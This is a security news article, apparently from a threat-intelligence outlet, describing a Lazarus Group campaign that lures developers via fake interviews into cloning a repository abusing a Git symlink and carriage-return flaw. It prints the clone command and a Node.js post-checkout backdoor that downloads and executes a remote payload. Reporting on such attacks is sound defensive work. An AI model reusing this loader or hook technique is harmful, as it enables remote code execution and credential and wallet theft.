Lazarus Hackers Exploiting Git Symlink Vulnerability in Sophisticated Phishing Attack

Early this month, cybersecurity researchers uncovered a novel phishing campaign attributed to the Lazarus Group that targets developers and crypto professionals through a cleverly crafted Git symlink vulnerability.

Rather than relying solely on traditional malware distribution channels, the attackers have weaponized the way Git handles repository paths, embedding malicious hooks within symbolic links to trigger code execution during routine operations.

This technique allows the attackers to maintain a low profile while compromising high-value targets who assume that their development workflows are immune to social engineering.

The initial lure begins with personalized messages on professional networking platforms, where prospective victims are invited to participate in a mock technical interview.

The conversation is structured to gain the victim’s confidence and coax them into running a single Git clone command.

Besides this, the repository contains a nested directory named api/db_drivers that is actually a symbolic link pointing back into the repository’s .git module directory.

This deceptive structure ensures that once Git performs a checkout operation, it unwittingly executes the attacker’s custom hook script.

KuCoin analysts noted the first instances of this attack vector in late August, following reports of compromised private GitLab repositories.

Detailed analysis revealed that the symlink exploit leverages Git’s post-checkout hook mechanism to initiate a hidden backdoor.

By embedding a malicious post-checkout script within the symbolic link, the attackers achieve code execution without modifying the main codebase, thus evading standard integrity checks and static scanners.

Subsequent forensic examination confirmed that the payload establishes an encrypted connection to a remote command-and-control server, siphoning credentials, system information, and wallet data back to the threat actors.

The exploit’s sophistication lies in its seamless integration with legitimate workflows. Victims report that after executing:-

git clone --recursive https://guest:[email protected]/product/delivery.git
cd product/delivery

The malicious hook is automatically triggered. The embedded script, hooks/post-checkout, invokes a Node.js backdoor:-

const vm = require('vm');
const https = require('https');
https.get('https://gitlab.tresalabs.com:8443/api/v4/project', res => {
  let data="";
  res.on('data', chunk => data += chunk);
  res.on('end', () => vm.runInNewContext(Buffer.from(JSON.parse(data).payload, 'base64')));
});

Once deployed, this backdoor maintains persistence by cleaning and replacing project files to remove obvious signs of tampering, ensuring that developers see only the expected code.

Infection Mechanism Deep Dive

The infection unfolds in two coordinated phases: exploitation of Git’s path resolution and stealthy hook execution.

First, the attackers create a repository with a directory entry named api/db_drivers^M, exploiting carriage return handling to write the path as api/db_drivers on disk while retaining the symlink target internally.

This discrepancy confuses Git into treating the path as a regular directory during traversal but as a link when initializing hooks.

As Git performs the default checkout, it follows the hidden symlink into the .git/modules/api/db_drivers/hooks/ directory and executes the post-checkout script.

By exploiting a fundamental behavior of Git, the Lazarus Group has demonstrated a new level of technical ingenuity, blending supply chain compromise with social engineering to target high-value individuals.

The campaign serves as a stark reminder that even the most trusted development tools can be weaponized when assumptions about workflow integrity go unchallenged.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.